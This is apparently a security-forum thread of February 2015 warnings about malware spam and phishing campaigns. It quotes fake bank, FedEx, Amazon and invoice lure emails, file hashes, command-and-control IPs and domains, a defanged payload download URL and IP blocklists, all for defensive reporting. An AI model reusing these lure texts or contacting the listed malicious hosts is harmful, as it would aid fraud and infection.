> https://blog.malwarebytes.org/wp-content/uploads/2015/02/encrypted4.png
The bad guys demand a ransom that can be paid using Bitcoins:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/encrypted8.png
... The problem with ransomware is that while the active Trojans can be removed, it is much more difficult and sometimes impossible to recover the encrypted files. The folks at BleepingComputer* have some tips on how to restore your encrypted files. However, as is often the case, prevention is critical to avoid a nasty ransomware infection..."
* http://www.bleepingcomputer.com/virus-removal/ctb-locker-ransomware-information#shadow
- http://net-security.org/malware_news.php?id=2952
03.02.2015
> http://www.net-security.org/images/articles/chrome-mal-03022015.jpg
:fear::fear: :mad:
AplusWebMaster
2015-02-03, 14:46
FYI...
Fake 'CIT' SPAM – doc malware
- http://myonlinesecurity.co.uk/cit-inv-15000375-po-sp14161-word-doc-malware/
3 Feb 2015 - "'CIT Inv# 15000375 for PO# SP14161' pretending to come from Circor <_CIG-EDI@ CIRCOR .COM> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/CIT-Inv-15000375-for-PO-SP14161.png
3 February 2015: FOPRT01.DOC - Current Virus total detections: 1/57*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/476eaa256c7a17e93e18312bc00049f9a838097bbdab8b8a56d581e3948dca23/analysis/1422951071/
- http://blog.dynamoo.com/2015/02/malware-spam-circor-cig-edicircorcom.html
3 Feb 2015
"... Recommended blocklist:
143.107.17.183
92.63.88.108 "
___
Fake 'Barclays Your Debit Card' – Phish ...
- http://myonlinesecurity.co.uk/barclays-debit-card-notification-phishing/
3 Feb 2015 - "'Your Debit Card Notification' pretending to come from Barclays Bank Plc is one of the latest phish attempts to steal your Barclays Bank, debit card and personal details. This one only wants your Barclays log in details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well... The website at gardendecore .pl have cleaned up the phishing pages and hopefully plugged the security holes or vulnerabilities that let the bad guys get in in the first place. If you follow the link you see a webpage looking like the genuine Barclays log in page:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish_-feb_2015.png
When you fill in the required details there, the phishers then send you on to the next page where they ask you to fill in your name, details and passcodes, the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___
Fake 'Garrett' SPAM - malware
- http://myonlinesecurity.co.uk/pulsar-instruments-plc-garrett-courtright-copy-07441489933-malware/
3 Feb 2015 - "'Garrett Courtright Copy from +07441489933' pretending to come from Garrett Courtright <ophidian@ nagsgolf .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Fax: +07441489933
Date: 2015/01/18 16:43:04 CST
Pages: 1
Reference number: Y67969682C281D
Filename: pulsar_instruments_plc57.zip
Pulsar Instruments Plc
Garrett Courtright
3 February 2015 : pulsar_instruments_plc57.zip: Extracts to: pulsar_instruments_plc57.scr
Current Virus total detections: 7/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c02902664a73255408adc93bb1b0b8075759eacbf16dbb9a88c96343f46818b3/analysis/1422985036/
... Behavioural information
TCP connections
213.186.33.2: https://www.virustotal.com/en/ip-address/213.186.33.2/information/
5.178.43.10: https://www.virustotal.com/en/ip-address/5.178.43.10/information/
___
Fake 'Halifax' SPAM – Phish ...
- http://myonlinesecurity.co.uk/update-account-details-halifax-phishing/
3 Feb 2015 - "'Update your account details' pretending to come from Halifax Online Banking <securitynews@halifax.co.uk> is one of the latest phish attempts to steal your Bank, credit card and personal details. An alternative email says 'We’re improving your Halifax account' also pretending to come from Halifax Online Banking <securitynews@ halifax .co .uk>. This one wants all your personal details including email address and password and your credit card and bank details. Many of them are also designed to specifically steal your facebook and other social network log in details as well... don’t -ever- open or fill in the html (webpage) form that comes attached to the email... If you do it will lead you to a website that looks at first glance like the genuine bank website but you can clearly see in the address bar, that it is -fake-. Some versions of this phish will ask you to follow a link in the body of the email to a phishing site. Both of today’s emails have different phish sites in the attached html files but otherwise the attachments are identical.
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/halifax_phish_email_2.png
-or-
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/halifax_phish_email_1.png
If you open the attached html file you see a webpage looking like this (split in 2 to get it all):
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/halifax1-1024x587.png
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/halifax21-1024x620.png
... these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
:fear: :mad:
AplusWebMaster
2015-02-04, 19:27
FYI...
Fake 'USPS Delivery' SPAM – doc malware
- http://myonlinesecurity.co.uk/usps-delivery-notification-word-doc-malware/
4 Feb 2015 - "'USPS Delivery Notification' pretending to come from USPS <no-reply@ usps .gov> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/USPS-Delivery-Notification-1024x614.png
4 February 2015: label_54633541.doc - Current Virus total detections: 2/55*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email..."
* https://www.virustotal.com/en/file/5ac0c18b4743626c3c49492cd7470c1b4060c553705bb49612a5d1b2be0c2fb5/analysis/1423064590/
___
Pawn Storm Update: -iOS- Espionage App Found
- http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/
Feb 4, 2015 - "... spyware specifically designed for espionage on -iOS- devices. While spyware targeting -Apple- users is highly notable by itself, this particular spyware is also involved in a targeted attack... Operation Pawn Storm is an active economic and political cyber-espionage operation that targets a wide range of entities, like the military, governments, defense industries, and the media. The actors of Pawn Storm tend to first move a lot of pawns in the hopes they come close to their actual, high profile targets. When they finally successfully infect a high profile target, they might decide to move their next pawn forward: advanced espionage malware... The iOS malware we found is among those advanced malware. We believe the iOS malware gets installed on already compromised systems, and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows’ systems... The obvious goal of the SEDNIT-related spyware is to steal personal data, record audio, make screenshots, and send them to a remote command-and-control (C&C) server. As of this publishing, the C&C server contacted by the iOS malware is -live- ...
C&C Communication: Besides collecting information from the iOS device, the app sends the information out via HTTP. It uses POST request to send messages, and GET request to receive commands... The exact methods of installing these malware is unknown. However, we do know that the iOS device doesn’t have to be jailbroken per se. We have seen one instance wherein a lure involving XAgent simply says “Tap Here to Install the Application.” The app uses Apple’s ad hoc provisioning, which is a standard distribution method of Apple for iOS App developers. Through ad hoc provisioning, the malware can be installed simply by clicking-on-a-link, such as in the picture below:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/01/pwnstrm10.png
There may be other methods of infection that are used to install this particular malware. One possible scenario is infecting an iPhone* after connecting it to a compromised -or- infected Windows laptop via a USB cable...
* http://blog.trendmicro.com/trendlabs-security-intelligence/the-other-side-of-masque-attacks-data-encryption-not-found-in-ios-apps/
The hashes of the related files are:
05298a48e4ca6d9778b32259c8ae74527be33815
176e92e7cfc0e57be83e901c36ba17b255ba0b1b
30e4decd68808cb607c2aba4aa69fb5fdb598c64 ..."
- http://arstechnica.com/security/2015/02/spyware-aimed-at-western-governments-journalists-hits-ios-devices/
Feb 4 2015
___
Apps on Google Play Pose As Games - Infect Millions with Adware
- https://blog.avast.com/2015/02/03/apps-on-google-play-pose-as-games-and-infect-millions-of-users-with-adware/
Feb 3, 2015 - "A couple of days ago, a user posted a comment on our forum* regarding apps harboring adware that can be found on Google Play. This didn’t seem like anything spectacular at the beginning, but once I took a closer look it turned out that this malware was a bit bigger than I initially thought. First of all, the apps are on Google Play, meaning that they have a huge target audience – in English speaking and other language regions as well. Second, the apps were already downloaded by millions of users and third, I was surprised that the adware lead to some legitimate companies:
> https://blog.avast.com/wp-content/uploads/2015/02/Durak-game-GP.png
The Durak card game app was the most widespread of the malicious apps with 5–10 million installations according to Google Play:
> https://blog.avast.com/wp-content/uploads/2015/02/Durak-1-player-2-player-rules-300x168.png
When you install Durak, it seems to be a completely normal and well working gaming app. This was the same for the other apps, which included an IQ test and a history app. This impression remains until you reboot your device and wait for a couple of days. After a week, you might start to feel there is something wrong with your device. Some of the apps wait up to 30 days until they show their true colors. After 30 days, I guess not many people would know which app is causing abnormal behavior on their phone, right? Each time you unlock your device an ad is presented to you, warning you about a problem, e.g. that your device is infected, out of date or full of porn. This, of course, is a complete lie. You are then asked to take action, however, if you approve you get re-directed to harmful threats on fake pages, like dubious app stores and apps that attempt to send premium SMS behind your back or to apps that simply collect too much of your data for comfort while offering you no additional value.
> https://blog.avast.com/wp-content/uploads/2015/02/Threats-detected-malcious-apps-300x261.jpg
An even bigger surprise was that users were sometimes directed to security apps on Google Play. These security apps are, of course, harmless, but would security providers really want to promote their apps via adware? Even if you install the security apps, the undesirable ads popping up on your phone don‘t stop. This kind of threat can be considered good social engineering. Most people won‘t be able to find the source of the problem and will face fake ads each time they unlock their device. I believe that most people will trust that there is a problem that can be solved with one of the apps advertised “solutions” and will follow the recommended steps, which may lead to an investment into unwanted apps from -untrusted- sources... the apps’ descriptions should make users -skeptical- about the legitimacy of the apps. Both in English and in other languages such as German, were written poorly: “A card game called ‘Durak‘ – one of the most common and well known game“. The apps‘ secure hash algorithm (SHA256) is the following:
BDFBF9DE49E71331FFDFD04839B2B0810802F8C8BB9BE93B5A7E370958762836 9502DFC2D14C962CF1A1A9CDF01BD56416E60DAFC088BC54C177096D033410ED FCF88C8268A7AC97BF10C323EB2828E2025FEEA13CDC6554770E7591CDED462D "
* https://forum.avast.com/?topic=165003.0
___
Data Integrity: The Core of Security
- http://www.securityweek.com/data-integrity-core-security
Feb 4, 2015 - "... Companies spend huge sums of money every year to maintain a security perimeter designed to fend off cyber and insider threats. According to Gartner*, worldwide spending on information security will reach $71.1 billion in 2014, an increase of 7.9 percent over 2013. Total information security spending will grow a further 8.2 percent in 2015 to reach $76.9 billion. Other Gartner figures show that in 2013, average budget allocations for information security were 5.1% of the overall IT budget, up 8.5% from 2012. However, the majority of investments are aimed at bolstering traditional perimeter security defenses, which is a losing battle... if we can prevent data from leaving the organization or being modified, protecting against network breaches becomes less critical. Unfortunately, data is often left unsecured... When it comes to information security, 100 percent protection in unattainable. However, by supplementing traditional perimeter defense mechanisms with data integrity principals, organizations can significantly reduce their exposure to Sony scale data breaches."
* http://www.gartner.com/newsroom/id/2828722
___
YouTube dumps Flash for HTML5
- http://www.infoworld.com/article/2877283/web-development/youtube-dumps-flash-for-html5.html
Jan 30, 2015 - "In a blow to proprietary rich Internet plug-ins, YouTube, which had been a stalwart supporter of Adobe’s Flash plug-in technology, revealed this week that it now -defaults- to the HTML5 <video> tag. The move shows HTML5's continued march toward Web dominance... Late Apple founder Steve Jobs probably did the most to the further the decline by refusing to support Flash on the company’s wildly popular iOS handheld devices. In fact, Flash shows a downward trajectory on W3Techs' report* on the number of websites using Adobe’s multimedia platform. It has -dropped- to 11.9 percent this month versus more than 15 percent a year ago. The numbers are far worse for Microsoft’s late-arriving Flash rival, Silverlight..."
* http://w3techs.com/technologies/details/cp-flash/all/all
:fear: :spider:
AplusWebMaster
2015-02-05, 18:45
FYI...
Fake HSBC SPAM - PDF malware
- http://myonlinesecurity.co.uk/hsbc-payment-advice-fake-pdf-malware/
5 Feb 2015 - "'HSBC Payment Advice' pretending to come from HSBC <no-replay@ hsbci .co .uk> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Sir/Madam
Upon your request, attached please find payment e-Advice for your
reference.
Yours faithfully
HSBC
We maintain strict security standards and procedures to prevent
unauthorised access to information about you. HSBC will never contact
you by e-mail or otherwise to ask you to validate personal information
such as your user ID, password, or account numbers. If you receive such
a request, please call our Direct Financial Services hotline.
Please do not reply to this e-mail. Should you wish to contact us,
please send your e-mail to commercialbanking@ hsbc .co .uk and we will
respond to you.
Note: it is important that you do not provide your account or credit
card numbers, or convey any confidential information or banking
instructions, in your reply mail.
Copyright. The Hongkong and Shanghai Banking Corporation Limited 2005.
All rights reserved...
5 February 2015: HSBC-69695.zip: Extracts to: CashPro.exe
Current Virus total detections: 4/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1f89e7f265686922f62acb94d4dd193197190574c953fbcf81ec729c72dadd35/analysis/1423139205/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
93.157.100.56: https://www.virustotal.com/en/ip-address/93.157.100.56/information/
178.47.141.100: https://www.virustotal.com/en/ip-address/178.47.141.100/information/
___
Fake FedEx SPAM - malicious script
- http://blog.dynamoo.com/2015/02/malware-spam-unable-to-deliver-your.html
5 Feb 2015 - "This -fake- FedEx spam has a malicious script attached.
From: FedEx 2Day A.M.
Date: 5 February 2015 at 15:01
Subject: PETRO, Unable to deliver your item, #0000220741
Dear Petro,
We could not deliver your item.
You can review complete details of your order in the find attached.
Yours sincerely,
Marion Bacon,
Delivery Manager.
(C) 2014 FedEx. The content of this message is protected by copyright and trademark laws.
Attached is a file FedEx_0000220741.zip which contains a malicious javascript which is highly obfuscated... but it is a bit clearer when deobfuscated... This script has a moderate detection rate of 9/56*, and downloads a file from:
http ://freesmsmantra .com/document.php?id=5451565E140110160B0824140110160B08000D160107104A070B09&rnd=3252631
Which is saved as %TEMP%\11827407.exe. This has a low detection rate of 3/56**. Automated analysis tools... don't give much of a clue as it has been hardened against analysis."
* https://www.virustotal.com/en/file/7284754c52f850158c541e00b28ab7ae1516c8161738da11c64bd5b259b48e12/analysis/1423149508/
** https://www.virustotal.com/en/file/cfa3dccd88c033117bccee4e01958b20253bfb562d82a73fa6ab65874abd66db/analysis/1423148815/
50.31.134.98: https://www.virustotal.com/en/ip-address/50.31.134.98/information/
___
Fake Barclays SPAM – Phish ...
- http://myonlinesecurity.co.uk/new-barclays-service-important-notice-phishing/
5 Feb 2015 - "'New Barclays Service Important Notice' pretending to come from Barclays Service [mailto:secure@ barclaysalertid .com] is one of the latest phish attempts to steal your Barclays Bank details. We have been seeing a quite large increase in Barclays phishing emails over the last week or so. Today’s version is particularly well done with a domain that will fool a lot of people...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/barclaycard_phishing-email_1.png
If you follow-the-link, you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish1.png
You then get:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish_check.png
Then you get this page which tries to convince you that various African IP addresses have accessed your account and scare you into going further:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish2.png
You then get the processing/checking screen again before being sent on to:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish3-1024x646.png
Where they ask you to fill in your name, details and passcodes, the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and format. And then once again to the processing/checking screen before you are sent on to the final page where they say they will send you a new pinsentry device by post:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish4-1024x603.png
All of these emails use Social engineering tricks to persuade you to open-the-attachments that come with the email..."
:fear: :mad:
AplusWebMaster
2015-02-06, 14:56
FYI...
Something evil on 5.196.143.0/28 and 5.196.141.24/29 ...
- http://blog.dynamoo.com/2015/02/something-evil-on-5196143028-and.html
6 Feb 2015 - "... interesting blog post from Cyphort* got me digging into that part of the infection chain using nonsense .eu domains. It uncovered a whole series of IPs and domains that have been used to spread Cryptowall (possibly other malware too), hosted in the 5.196.143.0/28 and 5.196.141.24/29 ranges (and possibly more). These are OVH IP ranges, suballocated to a customer called Verelox .com. I think that Verelox is a legitimate but very small web host that has suffered a major compromise of their servers. The first range is 5.196.141.24/29 which has apparently compromised servers at:
5.196.141.24, 5.196.141.25, 5.196.141.26, 5.196.141.27
... The second range is 5.196.143.0/28 with apparently -compromised- servers at:
5.196.143.3, 5.196.143.4, 5.196.143.5, 5.196.143.6, 5.196.143.7, 5.196.143.8, 5.196.143.10, 5.196.143.11,
5.196.143.12, 5.196.143.13
In addition to this, some of these domains use nameservers on the following IP addresses:
168.235.70.106
168.235.69.219
These are allocated to Ramnode LLC in the US. I would suggest that they are under the control of the bad guys and are worth -blocking- traffic to.
Note that Cyphort identify these C&C servers for the malware:
asthalproperties .com:4444
pratikconsultancy .com:8080
The following IPs and domain names all seem to be connected and I would recommend -blocking- at least the IP addresses and domains... other domains look like they are probably throwaway ones:
5.196.143.0/28
5.196.141.24/29
168.235.69.219
168.235.70.106
asthalproperties .com
pratikconsultancy .com ..."
(More detail at the dynamoo URL at the top of this post.)
* http://www.cyphort.com/gopego-malvertising-cryptowall/
___
Fake 'CashPro Online' SPAM – PDF malware
- http://myonlinesecurity.co.uk/cashpro-online-digital-certificate-fake-pdf-malware/
6 Feb 2015 - "'Your CashPro Online Digital Certificate' pretending to come from CashPro Online <no-replay@ cashpro .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear CashPro Customer,
This email is being sent to inform you that you have been granted a new
digital certificate for use with Bank of America CashPro Online.
Please open the attachment and you will be guided through a simple
process to install your new digital certificate.
If you have any questions or concerns, please contact the Bank of
America technical help desk.
Thank you for your business,
Bank of America
CashPro Online Security Team
Please do not reply to this email .
Copyright 2015 Bank of America Merrill Lynch. All rights reserved.
CashPro is a registered trademark of Bank of America Corporation.
6 February 2015: docs-20276.zip: Extracts to: docs.exe
Current Virus total detections: 3/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5387585bc905f6304b190493af158a714bdd0baed1be7e81db40407d4a92af01/analysis/1423239330/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
178.47.141.100: https://www.virustotal.com/en/ip-address/178.47.141.100/information/
192.185.35.92: https://www.virustotal.com/en/ip-address/192.185.35.92/information/
71.18.62.202: https://www.virustotal.com/en/ip-address/71.18.62.202/information/
UDP communications
77.72.174.163: https://www.virustotal.com/en/ip-address/77.72.174.163/information/
- http://threattrack.tumblr.com/post/110256192178/bank-of-america-cashpro-spam
Feb 6, 2014
docs.exe (1D38C362198AD67329FDF58B4743165E)
Tagged: bank of america, cashpro, Upatre
:fear::fear: :mad:
AplusWebMaster
2015-02-09, 17:59
FYI...
Fake 'Lloyds new message' SPAM – PDF malware
- http://myonlinesecurity.co.uk/lloyds-new-message-fake-pdf-malware/
9 Feb 2015 - "'You have a new message pretending to come from Lloyds Commercial Banking <GrpLloydslinkHelpdesk@ lloydsbanking .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Lloyds Commercial Logo
We want you to recognise a fraudulent email if you receive one. Lloyds Bank will always greet you personally using your title and surname and, where you hold an existing account with us, the last four digits of your account number: XXXX1328.
Dear Lloyds Link Customer,
You have a new message
There’s a new message for you, messages contain information about your account, so it’s important to view them.
If you’ve chosen to use a shared email address, please note that anyone who has access to your email account will be able to view your messages.
Please check attached message for more details.
Subject
Date
Account details
Account number
Important information about your account
09 Feb 2015
Lloyds Commercial
XXXX1328
Please note: this message is important and needs your immediate attention. Please check attached file straightaway to view it.
Yours sincerely
Signature image of Nicholas Williams - Consumer Digital Director
Nicholas Williams,
Consumer Digital Director
Please do not reply to this email as this address is not manned and cannot receive any replies.
Lloyds Bank plc. Registered Office: 25 Gresham Street, London EC2V 7HN. Registered in England and Wales, number 2065. Telephone: 020 7626 1500.
Lloyds Bank plc is authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and the Prudential Regulation Authority under registration number 119278.
9 February 2015: ImportantMessage.zip: Extracts to: ImportantMessage.scr
Current Virus total detections: 6/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a1baf36ebbc6ba4091f4c44e3b730fc376be6064884e1c50ee9a6e9ab4d6becd/analysis/1423485253/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
94.41.208.125: https://www.virustotal.com/en/ip-address/94.41.208.125/information/
198.23.48.157: https://www.virustotal.com/en/ip-address/198.23.48.157/information/
UDP communications
77.72.174.165: https://www.virustotal.com/en/ip-address/77.72.174.165/information/
77.72.174.164: https://www.virustotal.com/en/ip-address/77.72.174.164/information/
___
Fake 'Lloyds new debit' SPAM - PDF malware
- http://myonlinesecurity.co.uk/lloyds-received-new-debit-fake-pdf-malware/
9 Feb 2014 - "'You have received a new debit' pretending to come from Payments Admin <paymentsadmin@ lloydstsb .co .uk> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Monday 09 February 2014
This is an automatically generated email by the Lloyds TSB PLC
LloydsLink online payments Service to inform you that you have receive a
NEW Payment.
The details of the payment are attached.
This e-mail (including any attachments) is private and confidential and
may contain privileged material. If you have received this e-mail in
error, please notify the sender and delete it (including any
attachments) immediately. You must not copy, distribute, disclose or use
any of the information in it or any attachments.
9 February 2015 : details#00390702.zip: Extracts to: details.exe
Current Virus total detections: 6/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f7412fe1b3fa064fe1897d20be1e39e0a7cba3d25a081f23dd69d03a98dd34ca/analysis/1423485121/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
94.41.208.125: https://www.virustotal.com/en/ip-address/94.41.208.125/information/
91.103.216.71: https://www.virustotal.com/en/ip-address/91.103.216.71/information/
UDP communications
77.72.174.167: https://www.virustotal.com/en/ip-address/77.72.174.167/information/
77.72.174.166: https://www.virustotal.com/en/ip-address/77.72.174.166/information/
:fear: :mad:
AplusWebMaster
2015-02-10, 15:59
FYI...
Fake 'Amazon Order' SPAM – malware
- http://myonlinesecurity.co.uk/amazon-order-details-malware/
10 Feb 2015 - "'Amazon Order Details' pretending to come from Amazon.com > <delivers@ amazon .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This one is a lazy attempt to spread the malware using an old email from last year saying Order R:121216 Placed on June 28, 2014...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Amazon-Order-Details-1024x422.png
Todays Date: order_report.zip: Extracts to: order_report_238974983274928374892374982.exe
Current Virus total detections: 2/57* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5fc22d2913d37ee645965909c55c33b669a78f86688187b1a20c94f87076b0ef/analysis/1423571463/
___
Fake 'Purchase Order' SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-megtrade-groups.html
10 Feb 2015 - "This spam comes with a malicious attachment:
From: Megtrade groups [venkianch@ gmail .com]
Reply-To: venkanch@ gmail .com
Date: 10 February 2015 at 15:47
Subject: RE: Purchase Order Copy
Hello Vendor,
I just got back from business trip, Please find attached our purchasing order let us know price so as to confirm sample with your company.
You give us your payment terms but note our company payment policy 30% prepayment after confirming proforma invoice from you and the balance against copy of B/L.
Kindly treat as urgent and send invoice, I await to have your urgent reply to proceed.
Thanks & Best regards,
Mr Venkianch
Managing Director
NZ Megtrade Groups Ltd ... Download Attachment As zip
Unusually, this email does -not- appear to be sent out by a botnet but has been sent through -Gmail-. The link in the email goes www .ebayonline .com .ng/download/ohafi/jfred/Purchase%20Order%20Copy_pdf.7z where it downloads a file Purchase Order Copy_pdf.7z which (if you have 7-Zip installed) uncompresses to the trickily-named:
(1) Purchase Order Copy.pdf ___________________
(2) Delivery Time and Packing.pdf _______________________ _____ Adobe Reader.pdf
... or in .exe
As you might expect, this is malicious in nature and has a VirusTotal detection rate of 34/57*. The Malwr analysis** indicates that this installs a -keylogger- among other things."
* https://www.virustotal.com/en/file/0f24103be25179ed2d97c273ece36744612a81b57833c7d6f79d3b83b88f6761/analysis/1423585487/
** https://malwr.com/analysis/NmFjMWRhZWQyYjVmNDNlNjlmY2ZmMzdkMDRmYTM2NzI/
:fear: :mad:
AplusWebMaster
2015-02-11, 15:23
FYI...
Fake 'e-invoice' SPAM
- http://blog.dynamoo.com/2015/02/malware-spam-your-latest-e-invoice-from.html
11 Feb 2015 - "This -fake- invoice spam has a malicious attachment:
From: Lydia Oneal
Date: 11 February 2015 at 09:14
Subject: Your latest e-invoice from HSBC HLDGS
Dear Valued Customer,
Please find attached your latest invoice that has been posted to your online account. You’ll be pleased to know that your normal payment terms still apply as detailed on your invoice.
Rest assured, we operate a secure system, so we can confirm that the invoice DOC originates from HSBC HLDGS and is authenticated with a digital signature.
Thank you for using e-invoicing with HSBC HLDGS - the smarter, faster, greener way of processing invoices.
This message and any attachment are confidential and may be privileged or otherwise protected from disclosure.
If you are not the intended recipient, please telephone or email the sender and delete this message and any attachment from your system.
If you are not the intended recipient you must not copy this message or attachment or disclose the contents to any other person.
The company name and the name of the sender varies, but most of the body text remains identical. Some sample subjects are:
Your latest e-invoice from HSBC HLDGS
Your latest e-invoice from MAVEN INCOME & GROWTH VCT 3 PLC
Your latest e-invoice from DDD GROUP PLC
Your latest e-invoice from BAILLIE GIFFORD SHIN NIPPON
Your latest e-invoice from ACAL
Your latest e-invoice from PARAGON DIAMONDS LTD
Your latest e-invoice from TULLETT PREBON PLC
Your latest e-invoice from MERSEY DOCKS & HARBOUR CO
Your latest e-invoice from HOLDERS TECHNOLOGY
Your latest e-invoice from LED INTL HLDGS LTD
Your latest e-invoice from HALOS
Your latest e-invoice from ACORN INCOME FUND
The word document is randomly-named, for example 256IFV.doc, 19093WZ.doc and 097DVN.doc. There are three different versions of this malicious document, all with low detection rates [1] [2] [3] containing a slightly different macro in each case... The malware probably drops a Dridex DLL, although I have not been able to obtain this.
Recommended blocklist:
85.143.166.72
92.63.88.97
205.185.119.159
78.129.153.18
5.14.26.146
136.243.237.222
185.48.56.62
95.163.121.216 "
1] https://www.virustotal.com/en/file/049f8f402af29fcb09cd552b03eb23ee678428634920a2acd7096e646054d598/analysis/1423650591/
2] https://www.virustotal.com/en/file/60ad4099e56ed5a8fddb63395b0e0032726b5aaf47a71d590dddf147b433a976/analysis/1423650604/
3] https://www.virustotal.com/en/file/fdb34b9f8e3d6ee1098db6dfc800ff6a221ec10896536ad3ec3b4d31da77dc65/analysis/1423650615/
- http://myonlinesecurity.co.uk/latest-e-invoice-word-doc-malware/
11 Feb 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Your-latest-e-invoice-from-FINNAUST-MINING-PLC.png
___
Fake 'Outstanding Invoice' SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-gail-walker.html
11 Feb 2015 - "This fake invoice does -NOT- come from MBL Seminars, they are -not- sending this spam nor have their systems been compromised. Instead, this is a -forgery- with a malicious attachment.
From: Gail Walker [gail@ mblseminars .com]
Date: 11 February 2015 at 09:52
Subject: Outstanding Invoice 271741
Dear Customer
Payment for your Season Ticket was due by 31 January 2015 and has not yet been received. A copy of the invoice is attached.
By way of a reminder, the Season Ticket entitles all members of your organisation to save up to 50% on our public seminars and webinars. Since being a Season Ticket Holder your organisation has saved £728.50.
Please arrange for payment by return by BACS, cheque, or credit card. If payment has been arranged and just not reached us yet then please ignore this email.
If you have any queries, please do not hesitate to contact us.
Regards
Gail Walker
MBL (Seminars) Limited ...
So far I have seen two different malicious Word documents (there may be more) with low detection rates [1] [2] containing a different macro each... This file is saved as %TEMP%\dsHHH.exe. It has a VirusTotal detection rate of 10/57*... It also drops a DLL with a detection rate of 3/57** which is probably Dridex.
Recommended blocklist:
37.139.47.105
5.39.99.18
136.243.237.218
66.110.179.66
78.140.164.160
109.234.38.70 "
1] https://www.virustotal.com/en/file/30b22b141dcab6cc981008ddb04d95f90fa87ce2aeb41affd27bd5a704f62fd4/analysis/1423653571/
2] https://www.virustotal.com/en/file/83223934492586e28666cdb2ee4bf2bb3e78ead6d78d691274a5fe27a7fbb9a3/analysis/1423653583/
